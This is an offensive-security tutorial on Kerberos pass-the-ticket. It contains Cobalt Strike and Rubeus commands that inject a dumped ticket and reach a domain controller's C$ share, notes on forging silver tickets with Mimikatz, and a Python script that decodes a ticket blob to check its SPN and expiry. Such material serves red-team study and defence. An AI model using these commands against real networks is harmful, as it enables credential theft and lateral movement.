Pass-the-ticket reuses a Kerberos ticket (a TGT, or a service ticket bound to one SPN) that was dumped from memory or intercepted on the wire: the ticket is injected into a logon session, and from then on that session authenticates to the service as the ticket's principal without the attacker ever knowing the user's password or hash.
Requirements
- Admin privileges/credentials on the host the ticket is dumped from, with one distinction: dumping service tickets from your own logon session does not require admin privilege, but dumping a TGT (or any ticket from another user's logon session) does.
- For the lateral-movement step, the ticket's principal must be able to reach the target over SMB and open its administrative shares (Admin$ / C$).
A dumped service ticket is only valid for the SPN it was issued for and only until its end time. The attacker can reuse it directly wherever that service is reachable, or go further: crack the service account's password offline from the ticket's encrypted part (Kerberoasting), derive the account's key from it, and use Mimikatz kerberos::golden with the /service and /rc4 (or AES) options to forge a silver ticket for that service. A silver ticket is signed with the service account's own key, so it is accepted without the KDC being involved and gives the attacker arbitrary access to that service on the remote machine for lateral movement and privilege escalation, independent of the original ticket's lifetime.
Example
Example with Cobalt Strike beacon & Rubeus:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /luid:0x798c2c /ticket:doIFuj[...snip...]lDLklP # inject the base64 KRB-CRED into logon session 0x798c2c; /luid needs an elevated beacon, omit it to inject into the beacon's own session
beacon> steal_token $pid # PID of a process running in that logon session, i.e. under the ticket's username; the beacon now uses that session's ticket cache
beacon> ls \\DC1\c$ # use the ticket; this only works if the ticket is for cifs/DC1 (or is a TGT that can request one) and the principal has access to C$
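Before injecting a dumped ticket it is worth checking that it is for the SPN you intend to hit and has not expired: a service ticket for another SPN does nothing for \\DC1\c$ (which needs cifs/DC1), and an expired one fails silently. Rubeus's describe action shows this on the beacon; the script below, an added example that is not part of the original page and not Rubeus or Mimikatz code, does the same offline for the base64 blob Rubeus prints as the /ticket: argument. That blob is a DER-encoded KRB-CRED whose first byte 0x76 is the [APPLICATION 22] tag, which is why it always starts with doI... like the one on this page; Rubeus wraps the ticket metadata (KrbCredInfo) with etype 0, so it is readable without any key. The domain CORP.LOCAL, user bob, host DC1.corp.local and the sample blob are constructed here.

```python
"""Inspect a Rubeus-style base64 KRB-CRED before passing it.

Added example for this page, not Rubeus or Mimikatz code. It reads the
`/ticket:` blob far enough to report client principal, target SPN,
session-key etype and expiry. Standard library only; the sample blob is
constructed below and is not a real ticket.
"""
import base64
from datetime import datetime, timezone


# ---- minimal DER reader (tag, length, value) --------------------------
def _read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def der_children(value):
    """Split the contents of a constructed type into [(tag, value), ...]."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = _read_tlv(value, pos)
        out.append((tag, val))
    return out


def ctx(children, n):
    """Contents of the explicitly tagged [n] field (tag 0xA0|n), or None."""
    for tag, val in children:
        if tag == 0xA0 | n:
            return der_children(val)[0][1]  # explicit tag wraps exactly one TLV
    return None


def _principal(seq_value):
    """PrincipalName: name-type [0], name-string [1] SEQUENCE OF GeneralString."""
    parts = der_children(ctx(der_children(seq_value), 1))
    return "/".join(v.decode() for _, v in parts)


def _krb_time(raw):
    """KerberosTime is GeneralizedTime 'YYYYMMDDHHMMSSZ' (UTC)."""
    return datetime.strptime(raw.decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)


def inspect_krb_cred(b64, now=None):
    """Summarise every KrbCredInfo in a base64 KRB-CRED. `now` is a KerberosTime string."""
    tag, body, _ = _read_tlv(base64.b64decode(b64), 0)
    if tag != 0x76:                         # [APPLICATION 22] = 0x60 | 22
        raise ValueError("not a KRB-CRED: leading tag 0x%02x" % tag)
    fields = der_children(_read_tlv(body, 0)[1])          # KRB-CRED SEQUENCE
    enc = der_children(ctx(fields, 3))                    # enc-part: EncryptedData
    etype = int.from_bytes(ctx(enc, 0), "big", signed=True)
    if etype != 0:
        raise ValueError("enc-part etype %d: KrbCredInfo is encrypted" % etype)
    app29 = _read_tlv(ctx(enc, 2), 0)[1]                  # EncKrbCredPart [APPLICATION 29]
    infos = ctx(der_children(_read_tlv(app29, 0)[1]), 0)  # ticket-info SEQUENCE OF
    now_dt = _krb_time(now.encode()) if now else datetime.now(timezone.utc)
    out = []
    for _, info in der_children(infos):
        f = der_children(info)
        end = _krb_time(ctx(f, 6))                        # endtime [6]
        out.append({
            "client": "%s@%s" % (_principal(ctx(f, 2)), ctx(f, 1).decode()),
            "service": "%s@%s" % (_principal(ctx(f, 9)), ctx(f, 8).decode()),
            "session_key_etype": int.from_bytes(ctx(der_children(ctx(f, 0)), 0), "big"),
            "endtime": end.isoformat(),
            "expired": now_dt >= end,
        })
    return out


# ---- DER writer, used only to construct the sample blob ---------------
def _tlv(tag, value):
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def _c(n, inner): return _tlv(0xA0 | n, inner)        # explicit [n] tag
def _int(v): return _tlv(0x02, bytes([v]))             # small non-negative ints only
def _gs(s): return _tlv(0x1B, s.encode())              # GeneralString
def _seq(*items): return _tlv(0x30, b"".join(items))
def _pn(ntype, *names): return _seq(_c(0, _int(ntype)), _c(1, _seq(*map(_gs, names))))


def build_sample_krb_cred():
    """Constructed sample (not a real ticket): cifs/DC1 service ticket for bob@CORP.LOCAL."""
    sname = _pn(2, "cifs", "DC1.corp.local")            # NT-SRV-INST
    ticket = _tlv(0x61, _seq(                           # Ticket [APPLICATION 1]
        _c(0, _int(5)), _c(1, _gs("CORP.LOCAL")), _c(2, sname),
        _c(3, _seq(_c(0, _int(18)), _c(2, _tlv(0x04, b"\x00" * 16))))))  # opaque enc-part
    info = _seq(                                        # KrbCredInfo
        _c(0, _seq(_c(0, _int(18)), _c(1, _tlv(0x04, b"\x11" * 32)))),   # AES256 session key
        _c(1, _gs("CORP.LOCAL")), _c(2, _pn(1, "bob")),                 # NT-PRINCIPAL
        _c(6, _tlv(0x18, b"20250101120000Z")),                           # endtime
        _c(8, _gs("CORP.LOCAL")), _c(9, sname))
    enc_cred_part = _tlv(0x7D, _seq(_c(0, _seq(info)))) # EncKrbCredPart [APPLICATION 29]
    krb_cred = _tlv(0x76, _seq(                         # KRB-CRED [APPLICATION 22]
        _c(0, _int(5)), _c(1, _int(22)), _c(2, _seq(ticket)),
        _c(3, _seq(_c(0, _int(0)), _c(2, _tlv(0x04, enc_cred_part))))))  # etype 0, no key
    return base64.b64encode(krb_cred).decode()


if __name__ == "__main__":
    blob = build_sample_krb_cred()
    for entry in inspect_krb_cred(blob):
        print(entry)
```

Run it on a real blob with inspect_krb_cred(open("ticket.b64").read().strip()); if "service" is not cifs/<target> and the ticket is not a TGT (krbtgt/REALM), the ls \\target\c$ step will fail regardless of whether ptt succeeded, and "expired" True means the ticket needs to be dumped again.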